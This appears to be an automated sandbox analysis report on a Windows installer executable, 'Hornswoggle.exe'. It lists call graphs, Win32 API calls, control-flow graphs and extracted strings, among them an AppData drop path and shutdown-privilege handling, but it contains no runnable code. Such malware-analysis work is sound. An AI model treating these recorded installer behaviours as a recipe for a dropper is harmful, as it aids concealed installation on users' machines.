MoveFileExA 3202->3243 3204->3211 3205->3183 3207 4058bd 3206->3207 3208 405d1e 38 API calls 3207->3208 3208->3211 3210->3202 3212->3201 3213->3202 3253 405e63 lstrcpynA 3215->3253 3217 4059d4 3254 40596e CharNextA CharNextA 3217->3254 3220 405725 3220->3181 3220->3182 3221 4060ce 5 API calls 3224 4059ea 3221->3224 3222 405a15 lstrlenA 3223 405a20 3222->3223 3222->3224 3225 4058d5 3 API calls 3223->3225 3224->3220 3224->3222 3226 406167 2 API calls 3224->3226 3228 40591c 2 API calls 3224->3228 3227 405a25 GetFileAttributesA 3225->3227 3226->3224 3227->3220 3228->3222 3229->3185 3231 405929 3230->3231 3232 40593a 3231->3232 3233 40592e CharPrevA 3231->3233 3232->3189 3233->3231 3233->3232 3234->3202 3260 405ab1 GetFileAttributesA 3235->3260 3238 4056e0 DeleteFileA 3240 4056e6 3238->3240 3239 4056d8 RemoveDirectoryA 3239->3240 3241 4056ea 3240->3241 3242 4056f6 SetFileAttributesA 3240->3242 3241->3202 3242->3241 3244 405d3f 3243->3244 3245 405d32 3243->3245 3244->3202 3263 405bac lstrcpyA 3245->3263 3248 405896 3247->3248 3249 40617d FindClose 3247->3249 3248->3211 3250 4058d5 lstrlenA CharPrevA 3248->3250 3249->3248 3251 4058a0 3250->3251 3252 4058ef lstrcatA 3250->3252 3251->3197 3252->3251 3253->3217 3255 405989 3254->3255 3257 405999 3254->3257 3256 405994 CharNextA 3255->3256 3255->3257 3259 4059b9 3256->3259 3258 405900 CharNextA 3257->3258 3257->3259 3258->3257 3259->3220 3259->3221 3261 4056c9 3260->3261 3262 405ac3 SetFileAttributesA 3260->3262 3261->3238 3261->3239 3261->3241 3262->3261 3264 405bd4 3263->3264 3265 405bfa GetShortPathNameA 3263->3265 3290 405ad6 GetFileAttributesA CreateFileA 3264->3290 3267 405d19 3265->3267 3268 405c0f 3265->3268 3267->3244 3268->3267 3270 405c17 wsprintfA 3268->3270 3269 405bde CloseHandle GetShortPathNameA 3269->3267 3271 405bf2 3269->3271 3272 405e85 18 API calls 3270->3272 3271->3265 3271->3267 3273 405c3f 3272->3273 3291 405ad6 GetFileAttributesA CreateFileA 3273->3291 3275 405c4c 3275->3267 3276 405c5b GetFileSize GlobalAlloc 3275->3276 3277 405d12 CloseHandle 3276->3277 3278 405c7d 3276->3278 3277->3267 3279 405b4e ReadFile 3278->3279 3280 405c85 3279->3280 3280->3277 3292 405a3b lstrlenA 3280->3292 3283 405cb0 3286 405a3b 4 API calls 3283->3286 3284 405c9c lstrcpyA 3285 405cbe 3284->3285 3287 405cf5 SetFilePointer 3285->3287 3286->3285 3288 405b7d WriteFile 3287->3288 3289 405d0b GlobalFree 3288->3289 3289->3277 3290->3269 3291->3275 3293 405a7c lstrlenA 3292->3293 3294 405a55 lstrcmpiA 3293->3294 3296 405a84 3293->3296 3295 405a73 CharNextA 3294->3295 3294->3296 3295->3293 3296->3283 3296->3284 4376 4028aa SendMessageA 4377 4028c4 InvalidateRect 4376->4377 4378 4028cf 4376->4378 4377->4378 3297 40322b SetErrorMode GetVersion 3298 403262 3297->3298 3299 403268 3297->3299 3300 4061fc 5 API calls 3298->3300 3301 40618e 3 API calls 3299->3301 3300->3299 3302 40327e lstrlenA 3301->3302 3302->3299 3303 40328d 3302->3303 3304 4061fc 5 API calls 3303->3304 3305 403295 3304->3305 3306 4061fc 5 API calls 3305->3306 3307 40329c #17 OleInitialize SHGetFileInfoA 3306->3307 3385 405e63 lstrcpynA 3307->3385 3309 4032d9 GetCommandLineA 3386 405e63 lstrcpynA 3309->3386 3311 4032eb GetModuleHandleA 3312 403302 3311->3312 3313 405900 CharNextA 3312->3313 3314 403316 CharNextA 3313->3314 3323 403326 3314->3323 3315 4033f0 3316 403403 GetTempPathA 3315->3316 3387 4031fa 3316->3387 3318 40341b 3320 403475 DeleteFileA 3318->3320 3321 40341f GetWindowsDirectoryA lstrcatA 3318->3321 3319 405900 CharNextA 3319->3323 3397 402cb6 GetTickCount GetModuleFileNameA 3320->3397 3324 4031fa 12 API calls 3321->3324 3323->3315 3323->3319 3326 4033f2 3323->3326 3325 40343b 3324->3325 3325->3320 3328 40343f GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3325->3328 3483 405e63 lstrcpynA 3326->3483 3327 403489 3329 403523 ExitProcess CoUninitialize 3327->3329 3338 405900 CharNextA 3327->3338 3368 40350f 3327->3368 3331 4031fa 12 API calls 3328->3331 3332 403657 3329->3332 3333 403539 3329->3333 3336 40346d 3331->3336 3334 4036d9 ExitProcess 3332->3334 3335 40365f GetCurrentProcess OpenProcessToken 3332->3335 3486 405659 3333->3486 3340 4036aa 3335->3340 3341 40367a LookupPrivilegeValueA AdjustTokenPrivileges 3335->3341 3336->3320 3336->3329 3343 4034a4 3338->3343 3346 4061fc 5 API calls 3340->3346 3341->3340 3342 40351f 3342->3329 3348 4034ea 3343->3348 3349 40354f 3343->3349 3347 4036b1 3346->3347 3351 4036c6 ExitWindowsEx 3347->3351 3355 4036d2 3347->3355 3350 4059c3 18 API calls 3348->3350 3490 4055dc 3349->3490 3354 4034f5 3350->3354 3351->3334 3351->3355 3354->3329 3484 405e63 lstrcpynA 3354->3484 3503 40140b 3355->3503 3356 403570 lstrcatA lstrcmpiA 3356->3329 3359 40358c 3356->3359 3357 403565 lstrcatA 3357->3356 3361 403591 3359->3361 3362 403598 3359->3362 3493 405542 CreateDirectoryA 3361->3493 3498 4055bf CreateDirectoryA 3362->3498 3363 403504 3485 405e63 lstrcpynA 3363->3485 3427 4037e3 3368->3427 3369 40359d SetCurrentDirectoryA 3370 4035b7 3369->3370 3371 4035ac 3369->3371 3502 405e63 lstrcpynA 3370->3502 3501 405e63 lstrcpynA 3371->3501 3374 405e85 18 API calls 3375 4035f6 DeleteFileA 3374->3375 3376 403603 CopyFileA 3375->3376 3382 4035c5 3375->3382 3376->3382 3377 40364b 3379 405d1e 38 API calls 3377->3379 3378 405d1e 38 API calls 3378->3382 3380 403652 3379->3380 3380->3329 3381 405e85 18 API calls 3381->3382 3382->3374 3382->3377 3382->3378 3382->3381 3383 4055f4 2 API calls 3382->3383 3384 403637 CloseHandle 3382->3384 3383->3382 3384->3382 3385->3309 3386->3311 3388 4060ce 5 API calls 3387->3388 3390 403206 3388->3390 3389 403210 3389->3318 3390->3389 3391 4058d5 3 API calls 3390->3391 3392 403218 3391->3392 3393 4055bf 2 API calls 3392->3393 3394 40321e 3393->3394 3506 405b05 3394->3506 3510 405ad6 GetFileAttributesA CreateFileA 3397->3510 3399 402cf9 3416 402d06 3399->3416 3511 405e63 lstrcpynA 3399->3511 3401 402d1c 3402 40591c 2 API calls 3401->3402 3403 402d22 3402->3403 3512 405e63 lstrcpynA 3403->3512 3405 402d2d GetFileSize 3406 402e2e 3405->3406 3426 402d44 3405->3426 3407 402c17 33 API calls 3406->3407 3409 402e35 3407->3409 3408 4031cd ReadFile 3408->3426 3410 402e71 GlobalAlloc 3409->3410 3409->3416 3514 4031e3 SetFilePointer 3409->3514 3413 402e88 3410->3413 3411 402ec9 3414 402c17 33 API calls 3411->3414 3419 405b05 2 API calls 3413->3419 3414->3416 3415 402e52 3417 4031cd ReadFile 3415->3417 3416->3327 3420 402e5d 3417->3420 3418 402c17 33 API calls 3418->3426 3421 402e99 CreateFileA 3419->3421 3420->3410 3420->3416 3421->3416 3422 402ed3 3421->3422 3513 4031e3 SetFilePointer 3422->3513 3424 402ee1 3425 402f5c 45 API calls 3424->3425 3425->3416 3426->3406 3426->3408 3426->3411 3426->3416 3426->3418 3428 4061fc 5 API calls 3427->3428 3429 4037f7 3428->3429 3430 4037fd 3429->3430 3431 40380f 3429->3431 3531 405dc1 wsprintfA 3430->3531 3432 405d4a 3 API calls 3431->3432 3433 40383a 3432->3433 3435 403858 lstrcatA 3433->3435 3437 405d4a 3 API calls 3433->3437 3436 40380d 3435->3436 3515 403aa8 3436->3515 3437->3435 3440 4059c3 18 API calls 3441 40388a 3440->3441 3442 403913 3441->3442 3444 405d4a 3 API calls 3441->3444 3443 4059c3 18 API calls 3442->3443 3445 403919 3443->3445 3446 4038b6 3444->3446 3447 403929 LoadImageA 3445->3447 3448 405e85 18 API calls 3445->3448 3446->3442 3452 4038d2 lstrlenA 3446->3452 3456 405900 CharNextA 3446->3456 3449 403950 RegisterClassA 3447->3449 3450 4039cf 3447->3450 3448->3447 3453 403986 SystemParametersInfoA CreateWindowExA 3449->3453 3454 4039d9 3449->3454 3451 40140b 2 API calls 3450->3451 3455 4039d5 3451->3455 3457 4038e0 lstrcmpiA 3452->3457 3458 403906 3452->3458 3453->3450 3454->3342 3455->3454 3463 403aa8 19 API calls 3455->3463 3460 4038d0 3456->3460 3457->3458 3461 4038f0 GetFileAttributesA 3457->3461 3459 4058d5 3 API calls 3458->3459 3464 40390c 3459->3464 3460->3452 3462 4038fc 3461->3462 3462->3458 3465 40591c 2 API calls 3462->3465 3466 4039e6 3463->3466 3532 405e63 lstrcpynA 3464->3532 3465->3458 3468 4039f2 ShowWindow 3466->3468 3469 403a75 3466->3469 3471 40618e 3 API calls 3468->3471 3524 40514e OleInitialize 3469->3524 3473 403a0a 3471->3473 3472 403a7b 3474 403a97 3472->3474 3475 403a7f 3472->3475 3476 403a18 GetClassInfoA 3473->3476 3478 40618e 3 API calls 3473->3478 3477 40140b 2 API calls 3474->3477 3475->3454 3481 40140b 2 API calls 3475->3481 3479 403a42 DialogBoxParamA 3476->3479 3480 403a2c GetClassInfoA RegisterClassA 3476->3480 3477->3454 3478->3476 3482 40140b 2 API calls 3479->3482 3480->3479 3481->3454 3482->3454 3483->3316 3484->3363 3485->3368 3487 40566e 3486->3487 3488 403547 ExitProcess 3487->3488 3489 405682 MessageBoxIndirectA 3487->3489 3489->3488 3491 4061fc 5 API calls 3490->3491 3492 403554 lstrcatA 3491->3492 3492->3356 3492->3357 3494 405593 GetLastError 3493->3494 3495 403596 3493->3495 3494->3495 3496 4055a2 SetFileSecurityA 3494->3496 3495->3369 3496->3495 3497 4055b8 GetLastError 3496->3497 3497->3495 3499 4055d3 GetLastError 3498->3499 3500 4055cf 3498->3500 3499->3500 3500->3369 3501->3370 3502->3382 3504 401389 2 API calls 3503->3504 3505 401420 3504->3505 3505->3334 3507 405b10 GetTickCount GetTempFileNameA 3506->3507 3508 403229 3507->3508 3509 405b3d 3507->3509 3508->3318 3509->3507 3509->3508 3510->3399 3511->3401 3512->3405 3513->3424 3514->3415 3516 403abc 3515->3516 3533 405dc1 wsprintfA 3516->3533 3518 403b2d 3519 405e85 18 API calls 3518->3519 3520 403b39 SetWindowTextA 3519->3520 3521 403868 3520->3521 3522 403b55 3520->3522 3521->3440 3522->3521 3523 405e85 18 API calls 3522->3523 3523->3522 3534 404094 3524->3534 3526 405198 3527 404094 SendMessageA 3526->3527 3528 4051aa CoUninitialize 3527->3528 3528->3472 3530 405171 3530->3526 3537 401389 3530->3537 3531->3436 3532->3442 3533->3518 3535 4040ac 3534->3535 3536 40409d SendMessageA 3534->3536 3535->3530 3536->3535 3539 401390 3537->3539 3538 4013fe 3538->3530 3539->3538 3540 4013cb MulDiv SendMessageA 3539->3540 3540->3539 4379 4064ae 4383 406332 4379->4383 4380 406c9d 4381 4063b3 GlobalFree 4382 4063bc GlobalAlloc 4381->4382 4382->4380 4382->4383 4383->4380 4383->4381 4383->4382 4384 406433 GlobalAlloc 4383->4384 4385 40642a GlobalFree 4383->4385 4384->4380 4384->4383 4385->4384 3643 4015b3 3644 402a3a 18 API calls 3643->3644 3645 4015ba 3644->3645 3646 40596e 4 API calls 3645->3646 3659 4015c2 3646->3659 3647 40161c 3649 401621 3647->3649 3650 40164a 3647->3650 3648 405900 CharNextA 3648->3659 3651 401423 25 API calls 3649->3651 3653 401423 25 API calls 3650->3653 3652 401628 3651->3652 3662 405e63 lstrcpynA 3652->3662 3658 401642 3653->3658 3655 4055bf 2 API calls 3655->3659 3656 4055dc 5 API calls 3656->3659 3657 401633 SetCurrentDirectoryA 3657->3658 3659->3647 3659->3648 3659->3655 3659->3656 3660 401604 GetFileAttributesA 3659->3660 3661 405542 4 API calls 3659->3661 3660->3659 3661->3659 3662->3657 4386 4016b3 4387 402a3a 18 API calls 4386->4387 4388 4016b9 GetFullPathNameA 4387->4388 4389 4016d0 4388->4389 4390 4016f1 4388->4390 4389->4390 4393 406167 2 API calls 4389->4393 4391 401705 GetShortPathNameA 4390->4391 4392 4028cf 4390->4392 4391->4392 4394 4016e1 4393->4394 4394->4390 4396 405e63 lstrcpynA 4394->4396 4396->4390 4397 4014b7 4398 4014bd 4397->4398 4399 401389 2 API calls 4398->4399 4400 4014c5 4399->4400 4408 401d38 GetDC GetDeviceCaps 4409 402a1d 18 API calls 4408->4409 4410 401d56 MulDiv ReleaseDC 4409->4410 4411 402a1d 18 API calls 4410->4411 4412 401d75 4411->4412 4413 405e85 18 API calls 4412->4413 4414 401dae CreateFontIndirectA 4413->4414 4415 402513 4414->4415 4415->4415 3756 4051ba 3757 405365 3756->3757 3758 4051dc GetDlgItem GetDlgItem GetDlgItem 3756->3758 3760 405395 3757->3760 3761 40536d GetDlgItem CreateThread CloseHandle 3757->3761 3801 40407d SendMessageA 3758->3801 3763 4053e4 3760->3763 3764 4053ab ShowWindow ShowWindow 3760->3764 3765 4053c3 3760->3765 3761->3760 3804 40514e 5 API calls 3761->3804 3762 40524c 3770 405253 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3762->3770 3769 4040af 8 API calls 3763->3769 3803 40407d SendMessageA 3764->3803 3766 40541e 3765->3766 3767 4053d3 3765->3767 3768 4053f7 ShowWindow 3765->3768 3766->3763 3778 40542b SendMessageA 3766->3778 3772 404021 SendMessageA 3767->3772 3774 405417 3768->3774 3775 405409 3768->3775 3773 4053f0 3769->3773 3776 4052c1 3770->3776 3777 4052a5 SendMessageA SendMessageA 3770->3777 3772->3763 3780 404021 SendMessageA 3774->3780 3779 40507c 25 API calls 3775->3779 3781 4052d4 3776->3781 3782 4052c6 SendMessageA 3776->3782 3777->3776 3778->3773 3783 405444 CreatePopupMenu 3778->3783 3779->3774 3780->3766 3785 404048 19 API calls 3781->3785 3782->3781 3784 405e85 18 API calls 3783->3784 3787 405454 AppendMenuA 3784->3787 3786 4052e4 3785->3786 3790 405321 GetDlgItem SendMessageA 3786->3790 3791 4052ed ShowWindow 3786->3791 3788 405472 GetWindowRect 3787->3788 3789 405485 TrackPopupMenu 3787->3789 3788->3789 3789->3773 3792 4054a1 3789->3792 3790->3773 3794 405348 SendMessageA SendMessageA 3790->3794 3793 405303 ShowWindow 3791->3793 3796 405310 3791->3796 3795 4054c0 SendMessageA 3792->3795 3793->3796 3794->3773 3795->3795 3797 4054dd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3795->3797 3802 40407d SendMessageA 3796->3802 3799 4054ff SendMessageA 3797->3799 3799->3799 3800 405521 GlobalUnlock SetClipboardData CloseClipboard 3799->3800 3800->3773 3801->3762 3802->3790 3803->3765 3823 40173e 3824 402a3a 18 API calls 3823->3824 3825 401745 3824->3825 3826 405b05 2 API calls 3825->3826 3827 40174c 3826->3827 3828 405b05 2 API calls 3827->3828 3828->3827 4416 401ebe 4417 402a3a 18 API calls 4416->4417 4418 401ec5 4417->4418 4419 406167 2 API calls 4418->4419 4420 401ecb 4419->4420 4421 401edd 4420->4421 4423 405dc1 wsprintfA 4420->4423 4423->4421 4424 40443f 4425 404475 4424->4425 4426 40444f 4424->4426 4428 4040af 8 API calls 4425->4428 4427 404048 19 API calls 4426->4427 4429 40445c SetDlgItemTextA 4427->4429 4430 404481 4428->4430 4429->4425 4431 40193f 4432 402a3a 18 API calls 4431->4432 4433 401946 lstrlenA 4432->4433 4434 402513 4433->4434

                                                        Executed Functions

                                                        Function 0040322B Relevance: 94.9, APIs: 34, Strings: 20, Instructions: 357stringcomfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 40322b-403260 SetErrorMode GetVersion 1 403262-40326a call 4061fc 0->1 2 403273 0->2 1->2 7 40326c 1->7 4 403278-40328b call 40618e lstrlenA 2->4 9 40328d-403300 call 4061fc * 2 #17 OleInitialize SHGetFileInfoA call 405e63 GetCommandLineA call 405e63 GetModuleHandleA 4->9 7->2 18 403302-403307 9->18 19 40330c-403321 call 405900 CharNextA 9->19 18->19 22 4033e6-4033ea 19->22 23 4033f0 22->23 24 403326-403329 22->24 27 403403-40341d GetTempPathA call 4031fa 23->27 25 403331-403339 24->25 26 40332b-40332f 24->26 28 403341-403344 25->28 29 40333b-40333c 25->29 26->25 26->26 37 403475-40348f DeleteFileA call 402cb6 27->37 38 40341f-40343d GetWindowsDirectoryA lstrcatA call 4031fa 27->38 31 4033d6-4033e3 call 405900 28->31 32 40334a-40334e 28->32 29->28 31->22 50 4033e5 31->50 35 403350-403356 32->35 36 403366-403393 32->36 41 403358-40335a 35->41 42 40335c 35->42 43 403395-40339b 36->43 44 4033a6-4033d4 36->44 53 403523-403533 ExitProcess CoUninitialize 37->53 54 403495-40349b 37->54 38->37 52 40343f-40346f GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4031fa 38->52 41->36 41->42 42->36 46 4033a1 43->46 47 40339d-40339f 43->47 44->31 49 4033f2-4033fe call 405e63 44->49 46->44 47->44 47->46 49->27 50->22 52->37 52->53 59 403657-40365d 53->59 60 403539-403549 call 405659 ExitProcess 53->60 57 403513-40351a call 4037e3 54->57 58 40349d-4034a8 call 405900 54->58 69 40351f 57->69 75 4034aa-4034d3 58->75 76 4034de-4034e8 58->76 61 4036d9-4036e1 59->61 62 40365f-403678 GetCurrentProcess OpenProcessToken 59->62 71 4036e3 61->71 72 4036e7-4036eb ExitProcess 61->72 67 4036aa-4036b8 call 4061fc 62->67 68 40367a-4036a4 LookupPrivilegeValueA AdjustTokenPrivileges 62->68 82 4036c6-4036d0 ExitWindowsEx 67->82 83 4036ba-4036c4 67->83 68->67 69->53 71->72 78 4034d5-4034d7 75->78 79 4034ea-4034f7 call 4059c3 76->79 80 40354f-403563 call 4055dc lstrcatA 76->80 78->76 84 4034d9-4034dc 78->84 79->53 91 4034f9-40350f call 405e63 * 2 79->91 89 403570-40358a lstrcatA lstrcmpiA 80->89 90 403565-40356b lstrcatA 80->90 82->61 88 4036d2-4036d4 call 40140b 82->88 83->82 83->88 84->76 84->78 88->61 89->53 94 40358c-40358f 89->94 90->89 91->57 96 403591-403596 call 405542 94->96 97 403598 call 4055bf 94->97 104 40359d-4035aa SetCurrentDirectoryA 96->104 97->104 105 4035b7-4035df call 405e63 104->105 106 4035ac-4035b2 call 405e63 104->106 110 4035e5-403601 call 405e85 DeleteFileA 105->110 106->105 113 403642-403649 110->113 114 403603-403613 CopyFileA 110->114 113->110 116 40364b-403652 call 405d1e 113->116 114->113 115 403615-403635 call 405d1e call 405e85 call 4055f4 114->115 115->113 125 403637-40363e CloseHandle 115->125 116->53 125->113
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403250
                                                        • GetVersion.KERNEL32 ref: 00403256
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
                                                        • #17.COMCTL32(00000007,00000009), ref: 004032A1
                                                        • OleInitialize.OLE32(00000000), ref: 004032A8
                                                        • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
                                                        • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Hornswoggle.exe",00000000), ref: 004032EC
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Hornswoggle.exe",00000020), ref: 00403317
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403414
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403425
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403431
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403445
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040344D
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040345E
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403466
                                                        • DeleteFileA.KERNELBASE(1033), ref: 0040347A
                                                          • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                          • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                        • ExitProcess.KERNEL32(?), ref: 00403523
                                                        • CoUninitialize.COMBASE(?), ref: 00403528
                                                        • ExitProcess.KERNEL32 ref: 00403549
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
                                                        • ExitProcess.KERNEL32 ref: 004036EB
                                                          • Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                        • String ID: "$"C:\Users\user\Desktop\Hornswoggle.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls$C:\Users\user\Desktop$C:\Users\user\Desktop\Hornswoggle.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$error$~nsu
                                                        • API String ID: 3329125770-3060791393
                                                        • Opcode ID: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
                                                        • Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
                                                        • Opcode Fuzzy Hash: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
                                                        • Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E
                                                        Function 004051BA Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 126 4051ba-4051d6 127 405365-40536b 126->127 128 4051dc-4052a3 GetDlgItem * 3 call 40407d call 40491a GetClientRect GetSystemMetrics SendMessageA * 2 126->128 130 405395-4053a1 127->130 131 40536d-40538f GetDlgItem CreateThread CloseHandle 127->131 150 4052c1-4052c4 128->150 151 4052a5-4052bf SendMessageA * 2 128->151 133 4053c3-4053c9 130->133 134 4053a3-4053a9 130->134 131->130 138 4053cb-4053d1 133->138 139 40541e-405421 133->139 136 4053e4-4053eb call 4040af 134->136 137 4053ab-4053be ShowWindow * 2 call 40407d 134->137 147 4053f0-4053f4 136->147 137->133 140 4053d3-4053df call 404021 138->140 141 4053f7-405407 ShowWindow 138->141 139->136 144 405423-405429 139->144 140->136 148 405417-405419 call 404021 141->148 149 405409-405412 call 40507c 141->149 144->136 152 40542b-40543e SendMessageA 144->152 148->139 149->148 155 4052d4-4052eb call 404048 150->155 156 4052c6-4052d2 SendMessageA 150->156 151->150 157 405444-405470 CreatePopupMenu call 405e85 AppendMenuA 152->157 158 40553b-40553d 152->158 165 405321-405342 GetDlgItem SendMessageA 155->165 166 4052ed-405301 ShowWindow 155->166 156->155 163 405472-405482 GetWindowRect 157->163 164 405485-40549b TrackPopupMenu 157->164 158->147 163->164 164->158 167 4054a1-4054bb 164->167 165->158 170 405348-405360 SendMessageA * 2 165->170 168 405310 166->168 169 405303-40530e ShowWindow 166->169 171 4054c0-4054db SendMessageA 167->171 172 405316-40531c call 40407d 168->172 169->172 170->158 171->171 173 4054dd-4054fd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 171->173 172->165 175 4054ff-40551f SendMessageA 173->175 175->175 176 405521-405535 GlobalUnlock SetClipboardData CloseClipboard 175->176 176->158
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405219
                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405228
                                                        • GetClientRect.USER32(?,?), ref: 00405265
                                                        • GetSystemMetrics.USER32(00000002), ref: 0040526C
                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
                                                        • ShowWindow.USER32(?,00000008), ref: 00405308
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405329
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405237
                                                          • Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040537A
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000514E,00000000), ref: 00405388
                                                        • CloseHandle.KERNELBASE(00000000), ref: 0040538F
                                                        • ShowWindow.USER32(00000000), ref: 004053B2
                                                        • ShowWindow.USER32(?,00000008), ref: 004053B9
                                                        • ShowWindow.USER32(00000008), ref: 004053FF
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
                                                        • CreatePopupMenu.USER32 ref: 00405444
                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
                                                        • GetWindowRect.USER32(?,000000FF), ref: 00405479
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
                                                        • OpenClipboard.USER32(00000000), ref: 004054DE
                                                        • EmptyClipboard.USER32 ref: 004054E4
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
                                                        • GlobalLock.KERNEL32(00000000), ref: 004054F7
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405524
                                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040552F
                                                        • CloseClipboard.USER32 ref: 00405535
                                                        Strings
                                                        • Festremser Setup: Completed, xrefs: 004054AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
